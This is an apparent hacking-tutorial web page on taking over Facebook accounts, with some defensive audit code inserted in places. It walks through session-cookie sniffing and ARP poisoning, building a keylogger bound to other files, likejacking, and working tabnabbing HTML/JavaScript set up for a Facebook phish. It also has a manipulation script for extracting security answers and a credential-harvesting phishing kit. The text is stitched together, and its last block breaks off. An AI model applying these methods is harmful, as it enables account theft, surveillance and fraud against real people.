Facebook Hacking Methods All In One
So You Guys Wanna Learn Facebook Hacking... How To Hack Facebook Accounts Easily. Yeah, And I Mean It.
So Here Go All The Methods Of Facebook Hacking, From Zero To One...
Let's Go.
Before Starting, I Think You Guys All Know What Facebook Is And How To Use It... That's Why You Are Here.
So Before Starting, Let Me Clear One Thing: No Software Exists Which Will Hack Facebook For You.
The Only Two Methods By Which You Can Hack Facebook Are:
- Hire A Professional Hacker Who Will Hack For You
- Or Just Learn All These Methods which i'm Gonna Provide you
Facebook Hacking Methods Are Following:
1. Session Hijacking Attack
2. Facebook Security
3. Cookie Stealing Attack
4. Keylogging
5. Clickjacking
6. Tabnabbing
7. Remote Administration Tools
8. Social Engineering Attack
9. Phishing attack
10. Using 3 Fake Friends Method
- Session Hijacking Attack :-
What Is Session Hijacking Attack ?
Session hijacking, also known as TCP session hijacking, is a method of taking over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. Once the user's session ID has been accessed (through session prediction), the attacker can masquerade as that user and do anything the user is authorized to do on the network.
The session ID is normally stored within a cookie or URL. For most communications, authentication procedures are carried out at set up. Session hijacking takes advantage of that practice by intruding in real time, during a session. The intrusion may or may not be detectable, depending on the user's level of technical knowledge and the nature of the attack. If a Web site does not respond in the normal or expected way to user input or stops responding altogether for an unknown reason, session hijacking is a possible cause.
Step By Step Explanation Of How To Carry Out This Attack ?
First of all, you would need to connect to an unsecured wireless connection that others are using. Then we start capturing packets transferred over this network. Note that your wireless adapter needs to support monitor mode to scan all packets transferred over a network. You can check your Wi-Fi card specifications to see if it supports monitor mode.
We would then need to use a network sniffing tool to sniff packets transferred over the network. In this case, I am using a tool called Wireshark. Within Wireshark, there is a menu called "Capture"; under the Capture menu, select Interfaces, and a list of your interfaces will come up.
Next you select Start next to the interface that you have enabled monitor mode on. Most times it is the interface that is capturing the most packets. In my case, the Microsoft interface is capturing the most packets, so I will select to start capturing with the Microsoft interface. You would leave Wireshark to capture packets for a couple of seconds depending on the number of people currently using the network. Say 30 seconds if 10 people are currently using the network, or 30 minutes if there is barely any network activity going on. While capturing, Wireshark will look something like this.
After capturing a certain amount of packets, or running the capture for a certain amount of time, stop it by clicking on the stop current capture button.
After stopping the capture, you will need to look for the user's Facebook session cookie which, hopefully, was transferred in one of the packets captured. To find this cookie, use the Wireshark search, which can be found by pressing "ctrl + f" on your keyboard. In this search interface, select Find: By "String"; Search In: "Packet Details", and filter by the string "Cookie".
When you press find, if there is a cookie, this search will find it; if no cookie was captured, you will have to start back at step 2. However, if you're lucky and some cookies were captured, when you search for cookie, your interface will come up looking like this in the diagram below. You would notice the cookie next to the arrow contains lots of data. To get the data, the next thing you do is to right click on the cookie and click copy->description.
After copying the description, paste it in a text file, and separate each variable to a new line (note the end of every variable is depicted by a semicolon, e.g. c_user=100002316516702;). After some research and experimenting, I figured out that Facebook authenticated the user session by 2 cookies called c_user and xs. Therefore you will only need the values of these cookies, and then need to inject them into your browser. Before injecting the cookies, here is what my Facebook page looked like:
The next thing you would need to do is to inject this information as your own cookie. So firstly you would need to install a cookie manager extension for your browser; I'm using Firefox Cookie Manager. After installing this extension, you will find it under Tools->cookie manager. The interface for cookie manager looks like this:
The first thing we would need to do is to clear all cookies, so clear all the cookies you currently have. Then select the "Add Cookie" link to add a new cookie. The first cookie you will add is the c_user cookie, which will have the following information: Domain - ".facebook.com", name - "c_user", value - "the value you copied earlier from the wireshark scanning" and the Path - "/"; leave the isSecure and Expires On values to default:
The next thing you do is to hit the "Add" button and the cookie is saved. Repeat the same steps to add the xs cookie with all of the same information, except the value, which would be the xs value you have.
After adding these 2 cookies, just go to facebook.com, refresh the page and... Boom!! You will see you are logged in as that user whose cookie information you stole. Here is my Facebook page after I injected those cookies:
- Facebook Security :-
#1– Enable HTTPS ?
When you bookmark the URL for Facebook or any of your other social
networks, be sure to use HTTPS instead of HTTP. This encrypts your
communications.
In fact, you will have to temporarily disable this feature any time you
give access to a new application. That alone should give you confidence
that you have achieved a greater level of protection.
#2– Disable Online Chat ?
All of us have witnessed Facebook scams, with the most common being the
infamous chat message … “I’m in the UK and have been mugged – please
send money so I can get back home.”
While I have no technical basis for this, it stands to reason that the
hackers get in through the chat service. Every time I have noticed bogus
comments allegedly made by me to my Facebook friends, it is because I
had previously used the online chat.
To disable chat just click on the little wheel in the right sidebar and
take yourself offline. Then close the window and make sure it registers
as chat offline.
#3 – Review Permissions Granted to Third Party Apps ?
When you grant access to Facebook apps, those permissions endure long after you stop using them. Go to this link to
review your Facebook app permissions – and disable any you are no longer using.
You will probably be surprised at the long list of permissions you have previously granted!
#4 – Activate Text Message Notifications ?
Facebook allows you to receive text notifications whenever your account
is accessed from a device other than your primary computer or mobile
device.
You simply go to Account Settings and then to Security Settings to set-up the proper notifications to your mobile device.
First go to login approvals – then login notifications.
You can only choose email or text notifications. By choosing text
notifications you not only get an immediate notice, but you also
activate both your mobile device and your primary computer as approved
access points.
#5 – Maintain Public and Private Email Addresses ?
The email address you use for Facebook should be distinct from the one
you use where security is more critical – such as your online banking or
Paypal account.
If your Facebook account gets hacked, it's embarrassing. If that is the
same email used on your more secure accounts, now that vulnerability
could be costly.
Obviously, if you are selective with your email addresses and
periodically change your passwords, you minimize your chances of being
hacked.
Did you know that anyone can search Facebook for an email address? For
example, if you are looking for a common name such as John Smith, you only
need to search with their email to find the right one.
This is handy for finding your friends on Facebook, but also useful for
hackers. The safe bet is to use distinct passwords for your public and
private email addresses.
There are even more ways to protect your Facebook and other online
accounts, but these 5 are the most essential, and they are specific to
Facebook, which seems to be the site that is the most vulnerable.
Note: This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any
misuse that you do. Hacking email accounts is criminal activity and is
punishable under cyber crime and you may get upto 40 years of
imprisonment, if got caught in doing so.
- Cookie Stealing Attack :-
In this tutorial I will explain how you can hack Facebook/Twitter accounts by stealing cookies. This method works only when the victim's computer is in a LAN (local area network). The best place to try this out is in schools, colleges and cafes, where computers are connected in a LAN. Before I proceed, let me first explain cookies.
What Are Cookies ? And What Is The Use Of Stealing Cookies ?
Cookies are small files that are stored on a user's computer by websites when the user visits them. The stored cookies are used by the web server to identify and authenticate the user. For example, when a user logs in to Facebook, a unique string is generated; one copy of it is saved on the server and the other is saved in the user's browser as a cookie. Both are matched every time the user does anything in his account.
So if we steal the victim's cookies and inject them in our browser, we will be able to imitate the victim's identity to the web server and thus we will be able to log in to his account. This is called sidejacking. The best thing about this is that we need not know the victim's ID or password; all we need is the victim's cookie.
Hack Facebook / Twitter By Stealing Cookies ?
1. Ettercap or Cain and Abel for ARP poisoning the victim
2. Wireshark for sniffing and stealing cookies
3. Firefox browser and Cookie logger add-on for injecting the stolen cookies in our browser

1. First ARP poison the victim. For this you can refer to my previous articles on how to ARP poison the victim's computer using Cain and Abel or Ettercap.
2. After ARP poisoning, open Wireshark, click the capture button from the menu bar, then select interface. Now select your interface (usually eth0) and finally click start capture.
3. Now you can see the packets being captured. Wait for a while till the victim logs in to his account (Facebook/Twitter).
4. Meanwhile, find the IP address of Facebook. For this you can open CMD (command prompt) and enter ping Facebook.com to find its IP address.
5. Now filter the packets by entering the IP address (Facebook) in the filter bar and click apply.
6. Now locate HTTP GET /home.php and copy all the cookie names and values into a notepad.
7. Now open Firefox and open add and edit cookies, which we downloaded earlier, add all the cookie values and save them.
8. Now open Facebook in a new tab; you will be logged in to the victim's account.
Chris Defaulter Valentine ......you have hacked the victim's Facebook account by stealing cookies. You can also follow the same steps to hack Twitter accounts.
Hope you enjoyed this tutorial. If you have any doubts, please feel free to post a comment.
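Both the session hijacking walkthrough and the cookie stealing steps above depend on session cookies crossing the network in cleartext. The following is an added example, not part of the original post, of a server-side audit that flags responses which leave c_user and xs style session cookies exposed in that way; the function names, the example.test domain and all header values are constructed for illustration.

```javascript
// Added example: audit one HTTP response for the conditions that let a sniffed
// session cookie be replayed. Every header value below is a constructed sample.

// Cookies treated as session credentials. c_user and xs are the two names the
// article gives; a site auditing its own traffic would list its own.
const SESSION_COOKIES = new Set(["c_user", "xs"]);

// Parse one Set-Cookie header value into { name, value, attrs }.
function parseSetCookie(headerValue) {
  const parts = headerValue.split(";").map((p) => p.trim()).filter(Boolean);
  const pair = parts.shift() || "";
  const eq = pair.indexOf("=");
  const attrs = {};
  for (const part of parts) {
    const i = part.indexOf("=");
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return {
    name: eq === -1 ? pair : pair.slice(0, eq),
    value: eq === -1 ? "" : pair.slice(eq + 1),
    attrs,
  };
}

// response = { scheme: "http" | "https", headers: [[name, value], ...] }.
// Headers are a list of pairs because Set-Cookie repeats once per cookie.
function auditResponse(response) {
  const findings = [];
  const isHttps = response.scheme === "https";
  let hsts = null;
  for (const [rawName, value] of response.headers) {
    const name = rawName.toLowerCase();
    if (name === "strict-transport-security") hsts = value;
    if (name !== "set-cookie") continue;
    const cookie = parseSetCookie(value);
    if (!SESSION_COOKIES.has(cookie.name)) continue;
    // Issued in cleartext: anyone on the network path can read it.
    if (!isHttps) findings.push(`${cookie.name}: issued over cleartext HTTP`);
    // Without Secure the browser also attaches it to plain-HTTP requests.
    if (!cookie.attrs.secure) findings.push(`${cookie.name}: missing Secure`);
    // Without HttpOnly, script running in the page can read it.
    if (!cookie.attrs.httponly) findings.push(`${cookie.name}: missing HttpOnly`);
  }
  if (isHttps) {
    // HSTS stops the browser from making later requests over plain HTTP.
    const m = hsts ? /max-age\s*=\s*"?(\d+)/i.exec(hsts) : null;
    if (!m || Number(m[1]) === 0) {
      findings.push("no effective Strict-Transport-Security");
    }
  }
  return findings;
}

// Constructed sample responses (example.test is a reserved test domain).
const SAMPLE_CLEARTEXT = {
  scheme: "http",
  headers: [
    ["Set-Cookie", "c_user=1000000000; Path=/; Domain=.example.test"],
    ["Set-Cookie", "xs=constructed-token; Path=/; Domain=.example.test; HttpOnly"],
    ["Set-Cookie", "locale=en_US; Path=/"],
  ],
};
const SAMPLE_HTTPS_NO_HSTS = {
  scheme: "https",
  headers: [["Set-Cookie", "xs=constructed-token; Path=/; HttpOnly"]],
};
const SAMPLE_HARDENED = {
  scheme: "https",
  headers: [
    ["Strict-Transport-Security", "max-age=31536000; includeSubDomains"],
    ["Set-Cookie", "c_user=1000000000; Path=/; Secure; HttpOnly"],
    ["Set-Cookie", "xs=constructed-token; Path=/; Secure; HttpOnly"],
  ],
};

for (const [label, sample] of [
  ["cleartext", SAMPLE_CLEARTEXT],
  ["https without HSTS", SAMPLE_HTTPS_NO_HSTS],
  ["hardened", SAMPLE_HARDENED],
]) {
  console.log(label, auditResponse(sample));
}
```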
- Keylogging :-
What Is Keyloggers?
Using a key logger utility you will be able to establish full control over your computer. You will also find out what was going on on your computer in your absence: what was run and typed etc., which acts as the best children's internet protection software. Using the keylogging program constantly, you can restore previously typed text in case you have lost it. Keystroke logger software works in hidden mode and is invisible on Windows operating systems including Windows 7/VISTA/XP/Server 2008/NT/98 etc.
Let's start the guide: How to use it ?
1) First you need to download this application. You can download it from its website, but currently it's under maintenance.
2) I am giving the tut about Neptune 1.4 only, but you can use 1.45 also; it is an updated version that sends screenshots also.
After downloading, extract the .rar file, open the project's folder, click on project Neptune v1.4. Now it will show a window like shown below. Do whatever is mentioned in the screen shot.
Note: I am giving the tut for getting logs by mail (Gmail here), but you can use others also, or can use an FTP server also.
3) Now go to the 'Server Creation' tab and press 'Generate new server' under 'server creation', and give a name for your keylogger, and that's it.. you are done :)
4) Make it self destructive: In the tab Extra options, you can check 'self destruct on', if you want it to be removed after any particular date.
5) Add Icon: You can also add any icon to the final keylogger file. For that go to the 'Server Creation' tab and select 'Use file icon' under 'server settings' and select any icon file.
6) Binding: You can bind it with any other file also. For that press the file binder button; a window will open (as shown in screen shot). Then right click and select 'add file' and then select anything, e.g. any software, movie, video, song etc. with which you wanna bind it.
5.1) After selecting the binding file, don't close this window, and go to step 3.
7) Screenshots: (only available in Neptune 1.45) Go to Extra options, check 'send screen shots' under 'Screenshots'
- Clickjacking :-
What is Clickjacking?
Clickjacking is a technique used by hackers or spammers to trick or
cheat the users into clicking on links or buttons that are hidden from
normal view (usually links color is same as page background).
Clickjacking is possible because of a security weakness in web browsers
that allows web pages to be layered and hidden from general view. In
this situation what happens is that You think that you are clicking on a
standard button or link, like the PLAY button or download button on an
video or some stuff, but you are really clicking on a hidden link. Since
you can’t see the clickjacker’s hidden link, you have no idea what
you’re really doing. You could be downloading malware or making all your
Facebook information public without realizing it. Some good hackers
make ajax keyloggers and put them as javascripts over their fake
websites and when you open them they retrieve all your passwords stored
in web browser and records whatever you type while the web browser is
open and stores this information on their servers.
There are several types of clickjacking but the most common is to hide a
LIKE button under a dummy or fake button. This technique is called
Likejacking. A scammer or hacker might trick you into saying that you like
a product you’ve never heard of. At first glance, likejacking sounds more
annoying than harmful, but that’s not always true. If you’re scammed into
liking Mark Zuckerberg, the world isn’t likely to end. But you may be
helping to spread spam or possibly sending Friends somewhere that
contains malware.
How It Work ?
The like button is made hidden and it moves along with the mouse. So,
wherever the user clicks, the like button is clicked and your fan page
is liked. First download the JavaScript from the below download link.
Mediafire
After downloading the script extract all the files.Now modify the config.js and follow the below instructions.
1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.
2. There is a time out function after which the like button will not be present(move) anymore.
"time" if set to 0 will make it stay forever(which is usually not preferred).
3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible
Properly set the var in the file if it is jumbled ?
After modifying the config.js script upload these scripts to javascript hosting website.I prefer
yourjavascript you can also upload to some other website.
How To Run The Script ?
1. Add config.js just above head tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/config.js"> </script>
----------------------------------------------------------------------------------------------------------------
2. Add like.js after body tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/like.js"> </script>
----------------------------------------------------------------------------------------------------------------
Remove src link with your uploaded link.
5. That's it. The script is ready to go.
- Tabnabbing :-
Hey friends, It's Chris Defaulter Valentine. A Microsoft Certified Systems Engineer (MCSE), Internet Marketer, IIT hacker. I Have 10 Years' Experience Circumventing Information Security Measures And Can Report That I've Successfully Compromised All Systems That I Targeted For Unauthorized Access Except One. I Have Two Years' Experience As a Private Investigator, And My Responsibilities Included Finding People And Their Money, Primarily Using Social Engineering Techniques. Today I am going to explain how to hack emails, social networking websites and other websites involving login information. The technique that I am going to teach you today is Advanced Tabnabbing. I have already explained what basic tabnabbing is; today we will extend our knowledge base, and I will explain things with a practical example. So let's learn..
1. A hacker, say (me, Chris), customizes the current webpage by editing/adding some new parameters and variables (check the code below for details).
2. I send a copy of this web page to the victim whose account or whatever I want to hack.
3. Now when the user opens that link, a webpage similar to this one will open in an iframe containing the real page with the help of JavaScript.
4. The user will be able to browse the website like the original one, like forward and backward, and can navigate through pages.
5. Now if the victim leaves the new webpage open for a certain period of time, the tab or website will change to the Phish Page, or simply the fake page, which will look absolutely similar to the original one.
6. Now when the user enters his/her credentials (username/password), he is entering them in the fake page and gets trapped in the net that I have laid down to hack him.
Here ends the attack scenario for advanced tabnabbing.
Before the coding part, let's first share tips to protect yourself from this kind of attack, because it's completely undetectable and you will never be able to know that your account got hacked or compromised. So first learn how to protect ourselves from Advanced Tabnabbing.
Follow the below measures to protect yourself from Tabnabbing:
1. Always use anti-JavaScript plugins in your web browser that stop execution of malicious JavaScript. For example: NoScript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in an email or chat message, never directly click on it. Always prefer to type it manually in the address bar to open it. This may cost you some manual work or time but it will protect you from hidden malicious URLs.
4. The best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.
That ends our security part. Here ends my ethical hacker duty to notify all users about the attack. Now let's start the real stuff..
Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to the next level.
First sample code for doing tabnabbing with the help of iframes:
<!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: Chris Defaulter Valentine ( Anonymous )
-->
<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>
<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var
REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the
favicon. It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";
//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;
//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}
//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);
//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();
//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}
function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;
//Change the favicon -- This doesn't seem to work in IE
if(BROWSER_TYPE != "Internet Explorer"){
var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var looplink = links[i];
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>
</body>
</html>
Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE :
Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico (
Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.
Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other
social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free
web hosting website along
with favicon file and send the link to user in form of email or chat
message ( hidden using href keyword in html or spoofed using some other
technique).
That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..
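The layering that clickjacking relies on and the iframe wrapper in the sample above both need the target page to render inside a frame on another origin. The following is an added example, not part of the original post, of how a site owner can check whether the headers on its own responses permit that; the function names, origins and header values are constructed, and ancestor matching is simplified to the direct parent frame.

```javascript
// Added example: decide whether a response may be rendered inside a frame on
// another origin, from its X-Frame-Options and CSP frame-ancestors headers.
// All origins and header values are constructed samples.

// Return the frame-ancestors source list from one CSP header value, or null
// when the policy has no frame-ancestors directive.
function parseFrameAncestors(cspValue) {
  for (const directive of cspValue.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === "frame-ancestors") {
      return tokens.slice(1);
    }
  }
  return null;
}

// Match one source expression against the embedding origin. Ports and paths
// in host sources are ignored to keep the example short.
function sourceMatches(source, embedder, self) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return embedder === self;
  if (s === "*") return true;
  // Scheme source such as "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return embedder.startsWith(s + "//");
  // Host source: optional scheme, optional leading "*." wildcard
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^\/:]+)/.exec(s);
  if (!m) return false;
  const url = new URL(embedder);
  const [, scheme, wildcard, host] = m;
  if (scheme && url.protocol !== scheme + ":") return false;
  return wildcard ? url.hostname.endsWith("." + host) : url.hostname === host;
}

// headers: [[name, value], ...]; embedder: origin of the framing page;
// self: origin of the page being audited.
function framingDecision(headers, embedder, self) {
  let xfo = null;
  const policies = [];
  for (const [rawName, value] of headers) {
    const name = rawName.toLowerCase();
    if (name === "x-frame-options") xfo = value.trim().toUpperCase();
    if (name === "content-security-policy") {
      const list = parseFrameAncestors(value);
      if (list !== null) policies.push(list);
    }
  }
  // When frame-ancestors is present it takes precedence over X-Frame-Options,
  // and every policy that carries the directive has to allow the embedder.
  if (policies.length > 0) {
    const allowed = policies.every((list) =>
      list.some((src) => sourceMatches(src, embedder, self))
    );
    return { allowed, decidedBy: "frame-ancestors" };
  }
  if (xfo === "DENY") return { allowed: false, decidedBy: "x-frame-options" };
  if (xfo === "SAMEORIGIN") {
    return { allowed: embedder === self, decidedBy: "x-frame-options" };
  }
  // No framing policy at all: any page can wrap this one in an iframe.
  return { allowed: true, decidedBy: "none" };
}

// Constructed origins for the demonstration.
const SITE = "https://accounts.example.test";
const WRAPPER = "https://wrapper.example";

const SAMPLES = [
  ["no policy", []],
  ["XFO DENY", [["X-Frame-Options", "DENY"]]],
  ["CSP none", [["Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"]]],
  ["XFO DENY overridden by permissive CSP", [
    ["X-Frame-Options", "DENY"],
    ["Content-Security-Policy", "frame-ancestors *"],
  ]],
];
for (const [label, headers] of SAMPLES) {
  console.log(label, framingDecision(headers, WRAPPER, SITE));
}
```

The last sample is the case worth checking for in a real audit: a permissive `frame-ancestors` silently cancels a strict `X-Frame-Options`.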
- Remote Administration Tools :-
A remote administration tool (or RAT) is a program that allows certain persons to connect to and manage remote computers in the Internet or across a local network. A remote administration tool is based on the server and client technology. The server part runs on a controlled computer and receives commands...
I myself have had a few people in the past ask me questions on social engineering. I always say to anyone, you need to imagine social engineering as a game. But before I talk about the 'Game', I want to go into detail about basic knowledge and self preparation.
Basic knowledge and self preparation:
It's important, like most things in life, to be fully equipped and prepared to take on a task. I myself would suggest you have clear outlines of what you're trying to achieve, be it to get someone's email password, exploiting them for money, to get into an online game group/clan etc. In this case, the email and password of a Facebook account.
First of all, you need to take into consideration what you will need. For this social engineering tutorial I'm going to outline this from an obtaining-someone's-email-password perspective. Before I continue, I would like to stress some important factors you might want to take into consideration:
1) People are more open to you if they perceive you as an idiot.
2) People are less suspicious of you when you make them laugh.
3) People are more trusting if you actually take an interest in them.
I'm going to break these three points down to give you a better understanding of why this is:
In the case of 1 - nearly everyone seems to be more careless when they perceive you as an idiot. The main reason for that is, you don't consider someone who appears to be an idiot as a threat. Another reason is that people tend to become more open and arrogant when they feel they are on a higher pedestal than you (never forget that!). Now there are things you need to remember, however: although these things are true, if you overplay your idiot persona it will not be good for your fortune. Always remember real morons are annoying as hell; you DO NOT want to put off the person you're trying to social engineer (unless you're trying to fail, then knock yourself out).
In the case of 2 - when talking to someone it's easy to see why this rule is advised. Often it's a good ice breaker, also reinforcing the idea that "you're a nice guy"; it slowly allows the person to build a relationship of 'trust' with you.
In the case of 3 - also an obvious advisement. If you just pester someone for information without at least pretending to take an interest in what they are saying, not only will you come across as rude, it will make the person wonder why you're probing them for personal info.
With these three points made, I will now continue with my example of obtaining someone's Facebook email and password. Before you go into detail, it's important to outline what you need to successfully social engineer the password out of someone. Now you could try to social engineer them for their password; I advise you be a bit more intelligent and indirectly social engineer them for their password by obtaining their password recovery knowledge. Now it's important to know what you need to successfully hack their account through recovery questions. You will need the following:
Their email address
Their account password
With this in mind it's imperative you plan how you will obtain these details. I will tell you how I do it. But first I need you to understand, this whole transaction will not be completed over the course of a day; it can take days to weeks depending on the person. I suggest you talk to them and read them first. If they're open, then you can do it within days; if they're not, then it would be better you spread this out over a week or two. I also want you to imagine what you will say, try to predict their answers and MOST OF ALL, think of a scapegoat for why you're probing them for these answers, just in case you're less than subtle and arouse suspicion. If they ever suspect you it will go from a flame to a fire, so it's important to stamp out all of their doubt in you as soon as possible.
Now there are many ways you can obtain their password and address. Some people post their address on their profiles, in which case this is easy pickings; however, that is rare. So you need to devise a way of obtaining that info. Now you can pretend that you are from a bank or something like this and ask for their email address. Or you can pretend that you are some student doing some research. Be creative.
Now I need the answer to their security question, so you need to find out what the question is. I suggest you pretend to recover the password to see what it is, or get the info for all of the recovery questions the email provider asks. I'm going to go with the first option and say, for example, their recovery question was: What is your dog's name?
How I would go about obtaining this would be to pretend to have a pet of my own. I would start off the convo like so:
me: Ffs my dog wont stop barking, seriously where did i leave my ducktape lol!
victim: lol yeah i know sometimes my dog's the same, annoying -.-
me: Oh you have a dog? i didn't realize whats your dogs name, if you don't mind me asking.
It is important to add "if you don't mind me asking", because it gives the person a bit of power over you and also shows a little respect (once again reinforcing the notion you're a nice fellow).
POINT: I wouldn't dive straight into "whats your dogs name"; start with the breed first and remember to try to predict what they will in turn ask (mine's blah blah, what's yours?).
With that in mind, I'm sure by now you can see how easy it is to social engineer someone's password through the indirect method of password recovery. Now obviously most recovery questions won't be about pets; mostly they're "mother's maiden name", "place of birth" etc. But use the same logic and work around it. Remember to think every detail through and ask yourself this: if someone gave you this story or asked you in a certain way, would it seem legit to you?
And when you have the email address, click on Facebook's "I forgot password" and it will be sent to your email.
The Game:
The game is basically perfecting "self preparation". Social engineering is a game. Think about it in this way: each time trust is given to you, you advance a level, and with each level you advance, obtaining information from this person becomes easier. In a sense, mastering the ability to come up with more ingenious ways of manipulating someone, without arousing suspicion, is what separates the lucky noobs from the elites.
When thinking about this as a game, you need to reflect on your goals. As I've mentioned before, try to imagine the dialogue between you both, think about how you will obtain certain things and, more importantly, have clear directives. With this in mind I think we can now talk about how you might want to consider presenting yourself (only applies if the person is indeed a stranger).
So if you were going to go after a complete stranger, you should first try and get as much research on them as you can. For example, age, name. This is important for making up a fake identity. I would also suggest that if you social engineer more than one person you write down, in detail, your different aliases so you don't get confused. Nothing would be worse than using the wrong alias on the wrong person.
When building your identity, decide on what would give you the biggest advantage with this person. This can be from faking your age to match the interests of this person, thus giving you the advantage of being able to "click" with the person, to pretending to be a student or in a dead end job for sympathy manipulation or, in the case of a dead end job, pretending to relate to the slave. There are many things you can do; as I've mentioned, it depends on the circumstances you need.
Note: This tutorial is only for Educational Purposes. I do not take any responsibility for any misuse; you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get up to 40 years of imprisonment, if caught doing so.
Phishing - is an e-mail fraud method in which the perpetrator sends out legitimate-looking email in an attempt to gather personal and financial information from recipients. Typically, the messages appear to come from well known and trustworthy Web sites. Web sites that are frequently spoofed by phishers include PayPal, eBay, MSN, Yahoo, BestBuy, and America Online. A phishing expedition, like the fishing expedition it's named for, is a speculative venture: the phisher puts out the lure hoping to fool at least a few of the prey that encounter the bait.
1. First of all you need a fake login page for Facebook (fake.html), and a PHP script to redirect and capture the victim's passwords (login.php)
3. After you download the files, open login.php with Notepad and search for the term www.enteryoursite.com and replace it with the site address where you want the victim to be redirected, then save it.
Note : This is a very important step. Redirect the victim to a proper site, otherwise the victim will get suspicious. In our case we are making a fake Facebook login page, so it's better to redirect the victim to www.facebook.com/careers
4. Now create an account at a free web hosting site like 110mb.com, T35.com or ripway.com
5. Now upload both the files (fake.html, login.php) to your hosting account and send the fake.html (fake Facebook login page) link to your victim
Example:- www.yoursite.110mb.com/fake.html
6. Now when the victim enters all his credentials, like login name and password, in our fake login page and clicks login, he will be redirected to the site which we set in step 3
7. Now to see the victim's id and password, log in to your hosting account "110mb.com", where you will see a new file "log.txt". Open it to see the victim's user id and the password
This is a simple but very effective method to hack Facebook accounts. If you have any doubts please feel free to comment !!
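Seen from the defender's side, the kit described above has recognizable traits: a brand-named login form served from a third-party host, with the password field posting to a script on that same host. The check below is an added example, not code from the original page; the function names, the allow-list and the two HTML samples are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: the domains the defender treats as the brand's own.
BRAND_HOSTS = {"facebook.com"}
BRAND_WORDS = ("facebook",)

# Constructed samples (written for this example, not captured pages).
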